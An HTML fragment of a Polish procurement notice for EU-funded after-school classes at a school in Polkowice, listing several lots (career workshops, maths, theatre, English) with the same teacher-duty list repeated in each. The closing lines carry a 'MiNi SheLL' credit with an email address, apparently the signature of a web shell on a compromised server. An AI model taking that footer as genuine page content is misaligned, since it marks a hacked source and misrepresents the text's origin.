3.	Przygotowanie programu zajęć pozalekcyjnych i ich prowadzenie.
4.	Zebranie deklaracji uczestnictwa młodzieży w projekcie oraz upoważnień do przetwarzania danych osobowych młodzieży od rodziców lub opiekunów prawnych (w sytuacji, gdy młodzież uczestnicząca w zajęciach jest niepełnoletnia).
5.	Przetwarzanie danych osobowych młodzieży biorącej udział w Projekcie zgodnie  z obowiązującym prawem.
6.	Prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach                              oraz dokumentacji związanej z realizacją zajęć.
7.	Udostępnianie dziennika zajęć Kadrze Zarządzającej Projektem oraz osobom kontrolującym realizację Projektu.
8.	Monitoring działań przewidzianych w zadaniu oraz ich dokumentacja.
9.	Sporządzanie raportu postępu uczniów (oprócz części 1, 2 i 7).
10.	Przygotowanie sprawozdań.
11.	Współpraca z Kadrą Zarządzającą Projektem.
12.	Udział w spotkaniach roboczych zespołu projektowego.
13.	Przekazanie całej dokumentacji wytworzonej w podczas zajęć Koordynatorowi  w okresie dwóch tygodni po zakończeniu zajęć, nie później niż w ostatnim dniu trwania umowy.
14.	Odpracowanie zajęć, które nie odbyły się w terminach określonych  w harmonogramie   z powodu uzasadnionej nieobecności wszystkich uczniów biorących udział w zajęciach. Zleceniobiorca nie będzie rościł z tego tytułu dodatkowego wynagrodzenia.
15.	Poddanie się kontroli planowej i nieplanowej zarówno ze strony Zleceniodawcy, jak też instytucji zewnętrznych.
16.	Zapewnienie opieki i bezpieczeństwa uczestnikom zajęć.
17.	Informowanie i zgłaszanie Kadrze Zarządzającej Projektem wszelkich nieprawidłowości, problemów związanych z realizacją niniejszej umowy.
18.	Poinformowanie uczniów o realizacji zajęć w ramach Projektu Bądź kowalem swojego losu - program rozwojowy Liceum Ogólnokształcącego w Polkowicach - współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz dbanie, aby w salach, w których odbywają się zajęcia związane z realizacją przedmiotowego Projektu zawsze znajdowały się materiały promocyjne dotyczące Projektu. Materiały promocyjne zostaną dostarczone przez Koordynatora.

Miejscem wykonania świadczenia będzie Zespół Szkół im. Narodów Zjednoczonej Europy   w Polkowicach, ul. Skalników 6,  59-101 Polkowice..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> doradca zawodowy - warsztaty uczenia się pod nazwą Będę mistrzem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia doskonalące umiejętność wyboru i planowania swojej drogi zawodowej, podnoszące samoocenę. 1 prowadzący; 12 grup, w każdej po 8 godzin zegarowych. Łącznie 144 godziny zegarowe (96 godzin w roku szkolnym 2012/2013 i 48 godzin w roku szkolnym 2013/2014).
Zamawiający określając czas trwania zajęć jako godzina dydaktyczna ma na uwadze zapisy Rozporządzenia Ministra Edukacji Narodowej z dnia 17.11.2010 r. w sprawie zasad udzielania              i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach                  i placówkach (Dz. U. z 2010 r. nr 228 poz. 1487) tj.: Godzina zajęć rozwijających uzdolnienia              i zajęć dydaktyczno-wyrównawczych trwa 45 minut, a godzina zajęć specjalistycznych                       - 60 minut. Szczegółowe informacje na temat kwalifikacji rodzaju zajęć znajdują się w w/w rozporządzeniu.


Zakres czynności nauczycieli prowadzących zajęcia obejmuje:

1.	Realizację Projektu zgodnie z zapisami Umowy o dofinansowanie Projektu nr UDA-POKL.09.01.02-02-153/11-00, wnioskiem aplikacyjnym oraz harmonogramem realizacji Projektu.
2.	Pomoc przy sporządzeniu zamówienia na pomoce dydaktyczne do zajęć.
3.	Przygotowanie programu zajęć pozalekcyjnych i ich prowadzenie.
4.	Zebranie deklaracji uczestnictwa młodzieży w projekcie oraz upoważnień do przetwarzania danych osobowych młodzieży od rodziców lub opiekunów prawnych (w sytuacji, gdy młodzież uczestnicząca w zajęciach jest niepełnoletnia).
5.	Przetwarzanie danych osobowych młodzieży biorącej udział w Projekcie zgodnie                         z obowiązującym prawem.
6.	Prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach                              oraz dokumentacji związanej z realizacją zajęć.
7.	Udostępnianie dziennika zajęć Kadrze Zarządzającej Projektem oraz osobom kontrolującym realizację Projektu.
8.	Monitoring działań przewidzianych w zadaniu oraz ich dokumentacja.
9.	Sporządzanie raportu postępu uczniów (oprócz części 1, 2 i 7).
10.	Przygotowanie sprawozdań.
11.	Współpraca z Kadrą Zarządzającą Projektem.
12.	Udział w spotkaniach roboczych zespołu projektowego.
13.	Przekazanie całej dokumentacji wytworzonej w podczas zajęć Koordynatorowi               w okresie dwóch tygodni po zakończeniu zajęć, nie później niż w ostatnim dniu trwania umowy.
14.	Odpracowanie zajęć, które nie odbyły się w terminach określonych  w harmonogramie   z powodu uzasadnionej nieobecności wszystkich uczniów biorących udział w zajęciach. Zleceniobiorca nie będzie rościł z tego tytułu dodatkowego wynagrodzenia.
15.	Poddanie się kontroli planowej i nieplanowej zarówno ze strony Zleceniodawcy, jak też instytucji zewnętrznych.
16.	Zapewnienie opieki i bezpieczeństwa uczestnikom zajęć.
17.	Informowanie i zgłaszanie Kadrze Zarządzającej Projektem wszelkich nieprawidłowości, problemów związanych z realizacją niniejszej umowy.
18.	Poinformowanie uczniów o realizacji zajęć w ramach Projektu Bądź kowalem swojego losu - program rozwojowy Liceum Ogólnokształcącego w Polkowicach - współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz dbanie, aby w salach, w których odbywają się zajęcia związane  z realizacją przedmiotowego Projektu zawsze znajdowały się materiały promocyjne dotyczące Projektu. Materiały promocyjne zostaną dostarczone przez Koordynatora.

Miejscem wykonania świadczenia będzie Zespół Szkół im. Narodów Zjednoczonej Europy  w Polkowicach, ul. Skalników 6,  59-101 Polkowice..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zajęcia pozalekcyjne rozwijające zainteresowania przyrodniczo-ekologiczne pod nazwą Aktywni w środowisku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia kształtujące umiejętność interdyscyplinarnego myślenia, dostrzegania zależności między stanem środowiska  i społeczeństw, wykorzystania TIK do prezentacji wyników obserwacji i doświadczeń. Przygotowujące do konkursów i studiów na kierunkach przyrodniczych. 2 prowadzących; 2 grupy po 2 godziny w tygodniu. Łącznie 66 godzin dydaktycznych na prowadzącego (34 godziny w roku szkolnym 2012/2013 i 32 godziny w roku szkolnym 2013/2014).
Zamawiający określając czas trwania zajęć jako godzina dydaktyczna ma na uwadze zapisy Rozporządzenia Ministra Edukacji Narodowej z dnia 17.11.2010 r. w sprawie zasad udzielania  i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach  i placówkach (Dz. U. z 2010 r. nr 228 poz. 1487) tj.: Godzina zajęć rozwijających uzdolnienia              i zajęć dydaktyczno-wyrównawczych trwa 45 minut, a godzina zajęć specjalistycznych                       - 60 minut. Szczegółowe informacje na temat kwalifikacji rodzaju zajęć znajdują się w w/w rozporządzeniu.


Zakres czynności nauczycieli prowadzących zajęcia obejmuje:

1.	Realizację Projektu zgodnie z zapisami Umowy o dofinansowanie Projektu nr UDA-POKL.09.01.02-02-153/11-00, wnioskiem aplikacyjnym oraz harmonogramem realizacji Projektu.
2.	Pomoc przy sporządzeniu zamówienia na pomoce dydaktyczne do zajęć.
3.	Przygotowanie programu zajęć pozalekcyjnych i ich prowadzenie.
4.	Zebranie deklaracji uczestnictwa młodzieży w projekcie oraz upoważnień do przetwarzania danych osobowych młodzieży od rodziców lub opiekunów prawnych (w sytuacji, gdy młodzież uczestnicząca w zajęciach jest niepełnoletnia).
5.	Przetwarzanie danych osobowych młodzieży biorącej udział w Projekcie zgodnie                         z obowiązującym prawem.
6.	Prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach                              oraz dokumentacji związanej z realizacją zajęć.
7.	Udostępnianie dziennika zajęć Kadrze Zarządzającej Projektem oraz osobom kontrolującym realizację Projektu.
8.	Monitoring działań przewidzianych w zadaniu oraz ich dokumentacja.
9.	Sporządzanie raportu postępu uczniów (oprócz części 1, 2 i 7).
10.	Przygotowanie sprawozdań.
11.	Współpraca z Kadrą Zarządzającą Projektem.
12.	Udział w spotkaniach roboczych zespołu projektowego.
13.	Przekazanie całej dokumentacji wytworzonej w podczas zajęć Koordynatorowi               w okresie dwóch tygodni po zakończeniu zajęć, nie później niż w ostatnim dniu trwania umowy.
14.	Odpracowanie zajęć, które nie odbyły się w terminach określonych  w harmonogramie   z powodu uzasadnionej nieobecności wszystkich uczniów biorących udział w zajęciach. Zleceniobiorca nie będzie rościł z tego tytułu dodatkowego wynagrodzenia.
15.	Poddanie się kontroli planowej i nieplanowej zarówno ze strony Zleceniodawcy, jak też instytucji zewnętrznych.
16.	Zapewnienie opieki i bezpieczeństwa uczestnikom zajęć.
17.	Informowanie i zgłaszanie Kadrze Zarządzającej Projektem wszelkich nieprawidłowości, problemów związanych z realizacją niniejszej umowy.
18.	Poinformowanie uczniów o realizacji zajęć w ramach Projektu Bądź kowalem swojego losu - program rozwojowy Liceum Ogólnokształcącego w Polkowicach - współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz dbanie, aby w salach, w których odbywają się zajęcia związane z realizacją przedmiotowego Projektu zawsze znajdowały się materiały promocyjne dotyczące Projektu. Materiały promocyjne zostaną dostarczone przez Koordynatora.

Miejscem wykonania świadczenia będzie Zespół Szkół im. Narodów Zjednoczonej Europy  w Polkowicach, ul. Skalników 6,  59-101 Polkowice..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zajęcia pozalekcyjne dydaktyczno-wyrównawcze z matematyki pod nazwą Matematyka dla wszystkich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia ukierunkowane na rozwój kluczowych kompetencji matematycznych uczniów, pokonywanie barier w kontynuowaniu kształcenia matematyczno-przyrodniczego i technicznego. Zajęcia o charakterze wyrównawczym i przygotowującym do matury. 2 prowadzących; 2 grupy po 2 godziny w tygodniu. Łącznie   94 godziny dydaktyczne na prowadzącego (47 godzin w roku szkolnym 2012/2013 i 47 godzin w roku szkolnym 2013/2014).
Zamawiający określając czas trwania zajęć jako godzina dydaktyczna ma na uwadze zapisy Rozporządzenia Ministra Edukacji Narodowej z dnia 17.11.2010 r. w sprawie zasad udzielania              i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach                  i placówkach (Dz. U. z 2010 r. nr 228 poz. 1487) tj.: Godzina zajęć rozwijających uzdolnienia              i zajęć dydaktyczno-wyrównawczych trwa 45 minut, a godzina zajęć specjalistycznych                       - 60 minut. Szczegółowe informacje na temat kwalifikacji rodzaju zajęć znajdują się w w/w rozporządzeniu.


Zakres czynności nauczycieli prowadzących zajęcia obejmuje:

1.	Realizację Projektu zgodnie z zapisami Umowy o dofinansowanie Projektu nr UDA-POKL.09.01.02-02-153/11-00, wnioskiem aplikacyjnym oraz harmonogramem realizacji Projektu.
2.	Pomoc przy sporządzeniu zamówienia na pomoce dydaktyczne do zajęć.
3.	Przygotowanie programu zajęć pozalekcyjnych i ich prowadzenie.
4.	Zebranie deklaracji uczestnictwa młodzieży w projekcie oraz upoważnień do przetwarzania danych osobowych młodzieży od rodziców lub opiekunów prawnych (w sytuacji, gdy młodzież uczestnicząca w zajęciach jest niepełnoletnia).
5.	Przetwarzanie danych osobowych młodzieży biorącej udział w Projekcie zgodnie                         z obowiązującym prawem.
6.	Prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach                              oraz dokumentacji związanej z realizacją zajęć.
7.	Udostępnianie dziennika zajęć Kadrze Zarządzającej Projektem oraz osobom kontrolującym realizację Projektu.
8.	Monitoring działań przewidzianych w zadaniu oraz ich dokumentacja.
9.	Sporządzanie raportu postępu uczniów (oprócz części 1, 2 i 7).
10.	Przygotowanie sprawozdań.
11.	Współpraca z Kadrą Zarządzającą Projektem.
12.	Udział w spotkaniach roboczych zespołu projektowego.
13.	Przekazanie całej dokumentacji wytworzonej w podczas zajęć Koordynatorowi               w okresie dwóch tygodni po zakończeniu zajęć, nie później niż w ostatnim dniu trwania umowy.
14.	Odpracowanie zajęć, które nie odbyły się w terminach określonych  w harmonogramie   z powodu uzasadnionej nieobecności wszystkich uczniów biorących udział w zajęciach. Zleceniobiorca nie będzie rościł z tego tytułu dodatkowego wynagrodzenia.
15.	Poddanie się kontroli planowej i nieplanowej zarówno ze strony Zleceniodawcy, jak też instytucji zewnętrznych.
16.	Zapewnienie opieki i bezpieczeństwa uczestnikom zajęć.
17.	Informowanie i zgłaszanie Kadrze Zarządzającej Projektem wszelkich nieprawidłowości, problemów związanych z realizacją niniejszej umowy.
18.	Poinformowanie uczniów o realizacji zajęć w ramach Projektu Bądź kowalem swojego losu - program rozwojowy Liceum Ogólnokształcącego w Polkowicach - współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz dbanie, aby w salach, w których odbywają się zajęcia związane   z realizacją przedmiotowego Projektu zawsze znajdowały się materiały promocyjne dotyczące Projektu. Materiały promocyjne zostaną dostarczone przez Koordynatora.

Miejscem wykonania świadczenia będzie Zespół Szkół im. Narodów Zjednoczonej Europy  w Polkowicach, ul. Skalników 6,  59-101 Polkowice..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zajęcia pozalekcyjne rozwijające zainteresowania z matematyki pod nazwą Matematyka dla wszystkich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia ukierunkowane na rozwój kluczowych kompetencji matematycznych uczniów, pokonywanie barier w kontynuowaniu kształcenia matematyczno-przyrodniczego i technicznego, przygotowujące do konkursów. Zajęcia o charakterze wyrównawczym i przygotowującym do matury. 2 prowadzących; 2 grupy po  2 godziny w tygodniu. Łącznie 94 godziny dydaktyczne na prowadzącego (47 godzin w roku szkolnym 2012/2013 i 47 godzin w roku szkolnym 2013/2014).
Zamawiający określając czas trwania zajęć jako godzina dydaktyczna ma na uwadze zapisy Rozporządzenia Ministra Edukacji Narodowej z dnia 17.11.2010 r. w sprawie zasad udzielania              i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach                  i placówkach (Dz. U. z 2010 r. nr 228 poz. 1487) tj.: Godzina zajęć rozwijających uzdolnienia              i zajęć dydaktyczno-wyrównawczych trwa 45 minut, a godzina zajęć specjalistycznych                       - 60 minut. Szczegółowe informacje na temat kwalifikacji rodzaju zajęć znajdują się w w/w rozporządzeniu.


Zakres czynności nauczycieli prowadzących zajęcia obejmuje:

1.	Realizację Projektu zgodnie z zapisami Umowy o dofinansowanie Projektu nr UDA-POKL.09.01.02-02-153/11-00, wnioskiem aplikacyjnym oraz harmonogramem realizacji Projektu.
2.	Pomoc przy sporządzeniu zamówienia na pomoce dydaktyczne do zajęć.
3.	Przygotowanie programu zajęć pozalekcyjnych i ich prowadzenie.
4.	Zebranie deklaracji uczestnictwa młodzieży w projekcie oraz upoważnień do przetwarzania danych osobowych młodzieży od rodziców lub opiekunów prawnych (w sytuacji, gdy młodzież uczestnicząca w zajęciach jest niepełnoletnia).
5.	Przetwarzanie danych osobowych młodzieży biorącej udział w Projekcie zgodnie                         z obowiązującym prawem.
6.	Prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach                              oraz dokumentacji związanej z realizacją zajęć.
7.	Udostępnianie dziennika zajęć Kadrze Zarządzającej Projektem oraz osobom kontrolującym realizację Projektu.
8.	Monitoring działań przewidzianych w zadaniu oraz ich dokumentacja.
9.	Sporządzanie raportu postępu uczniów (oprócz części 1, 2 i 7).
10.	Przygotowanie sprawozdań.
11.	Współpraca z Kadrą Zarządzającą Projektem.
12.	Udział w spotkaniach roboczych zespołu projektowego.
13.	Przekazanie całej dokumentacji wytworzonej w podczas zajęć Koordynatorowi               w okresie dwóch tygodni po zakończeniu zajęć, nie później niż w ostatnim dniu trwania umowy.
14.	Odpracowanie zajęć, które nie odbyły się w terminach określonych  w harmonogramie   z powodu uzasadnionej nieobecności wszystkich uczniów biorących udział w zajęciach. Zleceniobiorca nie będzie rościł z tego tytułu dodatkowego wynagrodzenia.
15.	Poddanie się kontroli planowej i nieplanowej zarówno ze strony Zleceniodawcy, jak też instytucji zewnętrznych.
16.	Zapewnienie opieki i bezpieczeństwa uczestnikom zajęć.
17.	Informowanie i zgłaszanie Kadrze Zarządzającej Projektem wszelkich nieprawidłowości, problemów związanych z realizacją niniejszej umowy.
18.	Poinformowanie uczniów o realizacji zajęć w ramach Projektu Bądź kowalem swojego losu - program rozwojowy Liceum Ogólnokształcącego w Polkowicach- współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz dbanie, aby w salach, w których odbywają się zajęcia związane z realizacją przedmiotowego Projektu zawsze znajdowały się materiały promocyjne dotyczące Projektu. Materiały promocyjne zostaną dostarczone przez Koordynatora.

Miejscem wykonania świadczenia będzie Zespół Szkół im. Narodów Zjednoczonej Europy   w Polkowicach, ul. Skalników 6,  59-101 Polkowice..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> zajęcia pozalekcyjne rozwijające zainteresowania teatralne pod nazwą Teatr Anty dotum.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia z improwizacji teatralnej, pracy nad świadomością ciała, plastyki ruchu, dykcji, choreografii i tańca. 1 grupa - 4 godziny dydaktyczne w tygodniu. Łącznie 200 godzin dydaktycznych (100 godzin w roku szkolnym 2012/2013 i 100 godzin  w roku szkolnym 2013/2014).
Zamawiający określając czas trwania zajęć jako godzina dydaktyczna ma na uwadze zapisy Rozporządzenia Ministra Edukacji Narodowej z dnia 17.11.2010 r. w sprawie zasad udzielania              i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach                  i placówkach (Dz. U. z 2010 r. nr 228 poz. 1487) tj.: Godzina zajęć rozwijających uzdolnienia              i zajęć dydaktyczno-wyrównawczych trwa 45 minut, a godzina zajęć specjalistycznych                       - 60 minut. Szczegółowe informacje na temat kwalifikacji rodzaju zajęć znajdują się w w/w rozporządzeniu.


Zakres czynności nauczycieli prowadzących zajęcia obejmuje:

1.	Realizację Projektu zgodnie z zapisami Umowy o dofinansowanie Projektu nr UDA-POKL.09.01.02-02-153/11-00, wnioskiem aplikacyjnym oraz harmonogramem realizacji Projektu.
2.	Pomoc przy sporządzeniu zamówienia na pomoce dydaktyczne do zajęć.
3.	Przygotowanie programu zajęć pozalekcyjnych i ich prowadzenie.
4.	Zebranie deklaracji uczestnictwa młodzieży w projekcie oraz upoważnień do przetwarzania danych osobowych młodzieży od rodziców lub opiekunów prawnych (w sytuacji, gdy młodzież uczestnicząca w zajęciach jest niepełnoletnia).
5.	Przetwarzanie danych osobowych młodzieży biorącej udział w Projekcie zgodnie                         z obowiązującym prawem.
6.	Prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach                              oraz dokumentacji związanej z realizacją zajęć.
7.	Udostępnianie dziennika zajęć Kadrze Zarządzającej Projektem oraz osobom kontrolującym realizację Projektu.
8.	Monitoring działań przewidzianych w zadaniu oraz ich dokumentacja.
9.	Sporządzanie raportu postępu uczniów (oprócz części 1, 2 i 7).
10.	Przygotowanie sprawozdań.
11.	Współpraca z Kadrą Zarządzającą Projektem.
12.	Udział w spotkaniach roboczych zespołu projektowego.
13.	Przekazanie całej dokumentacji wytworzonej w podczas zajęć Koordynatorowi               w okresie dwóch tygodni po zakończeniu zajęć, nie później niż w ostatnim dniu trwania umowy.
14.	Odpracowanie zajęć, które nie odbyły się w terminach określonych  w harmonogramie   z powodu uzasadnionej nieobecności wszystkich uczniów biorących udział w zajęciach. Zleceniobiorca nie będzie rościł z tego tytułu dodatkowego wynagrodzenia.
15.	Poddanie się kontroli planowej i nieplanowej zarówno ze strony Zleceniodawcy, jak też instytucji zewnętrznych.
16.	Zapewnienie opieki i bezpieczeństwa uczestnikom zajęć.
17.	Informowanie i zgłaszanie Kadrze Zarządzającej Projektem wszelkich nieprawidłowości, problemów związanych z realizacją niniejszej umowy.
18.	Poinformowanie uczniów o realizacji zajęć w ramach Projektu Bądź kowalem swojego losu - program rozwojowy Liceum Ogólnokształcącego w Polkowicach - współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz dbanie, aby w salach, w których odbywają się zajęcia związane   z realizacją przedmiotowego Projektu zawsze znajdowały się materiały promocyjne dotyczące Projektu. Materiały promocyjne zostaną dostarczone przez Koordynatora.

Miejscem wykonania świadczenia będzie Zespół Szkół im. Narodów Zjednoczonej Europy  w Polkowicach, ul. Skalników 6,  59-101 Polkowice..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> zajęcia pozalekcyjne z języka angielskiego pod nazwą Koło języka angielskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia rozwijające sprawności językowe, poszerzające wiedzę z zakresu struktur leksykalno-gramatycznych, przygotowujące do matury. 2 prowadzących; 2 grupy po 2 godziny w tygodniu. Łącznie 94 godziny dydaktyczne na prowadzącego (47 godzin w roku szkolnym 2012/2013 i 47 godzin w roku szkolnym 2013/2014).
Zamawiający określając czas trwania zajęć jako godzina dydaktyczna ma na uwadze zapisy Rozporządzenia Ministra Edukacji Narodowej z dnia 17.11.2010 r. w sprawie zasad udzielania              i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach                  i placówkach (Dz. U. z 2010 r. nr 228 poz. 1487) tj.: Godzina zajęć rozwijających uzdolnienia              i zajęć dydaktyczno-wyrównawczych trwa 45 minut, a godzina zajęć specjalistycznych                       - 60 minut. Szczegółowe informacje na temat kwalifikacji rodzaju zajęć znajdują się w w/w rozporządzeniu.


Zakres czynności nauczycieli prowadzących zajęcia obejmuje:

1.	Realizację Projektu zgodnie z zapisami Umowy o dofinansowanie Projektu nr UDA-POKL.09.01.02-02-153/11-00, wnioskiem aplikacyjnym oraz harmonogramem realizacji Projektu.
2.	Pomoc przy sporządzeniu zamówienia na pomoce dydaktyczne do zajęć.
3.	Przygotowanie programu zajęć pozalekcyjnych i ich prowadzenie.
4.	Zebranie deklaracji uczestnictwa młodzieży w projekcie oraz upoważnień do przetwarzania danych osobowych młodzieży od rodziców lub opiekunów prawnych (w sytuacji, gdy młodzież uczestnicząca w zajęciach jest niepełnoletnia).
5.	Przetwarzanie danych osobowych młodzieży biorącej udział w Projekcie zgodnie                         z obowiązującym prawem.
6.	Prowadzenie dziennika zajęć i ewidencji osób uczestniczących w zajęciach                              oraz dokumentacji związanej z realizacją zajęć.
7.	Udostępnianie dziennika zajęć Kadrze Zarządzającej Projektem oraz osobom kontrolującym realizację Projektu.
8.	Monitoring działań przewidzianych w zadaniu oraz ich dokumentacja.
9.	Sporządzanie raportu postępu uczniów (oprócz części 1, 2 i 7).
10.	Przygotowanie sprawozdań.
11.	Współpraca z Kadrą Zarządzającą Projektem.
12.	Udział w spotkaniach roboczych zespołu projektowego.
13.	Przekazanie całej dokumentacji wytworzonej w podczas zajęć Koordynatorowi               w okresie dwóch tygodni po zakończeniu zajęć, nie później niż w ostatnim dniu trwania umowy.
14.	Odpracowanie zajęć, które nie odbyły się w terminach określonych  w harmonogramie   z powodu uzasadnionej nieobecności wszystkich uczniów biorących udział w zajęciach. Zleceniobiorca nie będzie rościł z tego tytułu dodatkowego wynagrodzenia.
15.	Poddanie się kontroli planowej i nieplanowej zarówno ze strony Zleceniodawcy, jak też instytucji zewnętrznych.
16.	Zapewnienie opieki i bezpieczeństwa uczestnikom zajęć.
17.	Informowanie i zgłaszanie Kadrze Zarządzającej Projektem wszelkich nieprawidłowości, problemów związanych z realizacją niniejszej umowy.
18.	Poinformowanie uczniów o realizacji zajęć w ramach Projektu Bądź kowalem swojego losu - program rozwojowy Liceum Ogólnokształcącego w Polkowicach - współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz dbanie, aby w salach, w których odbywają się zajęcia związane  z realizacją przedmiotowego Projektu zawsze znajdowały się materiały promocyjne dotyczące Projektu. Materiały promocyjne zostaną dostarczone przez Koordynatora.

Miejscem wykonania świadczenia będzie Zespół Szkół im. Narodów Zjednoczonej Europy w Polkowicach, ul. Skalników 6,  59-101 Polkowice..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com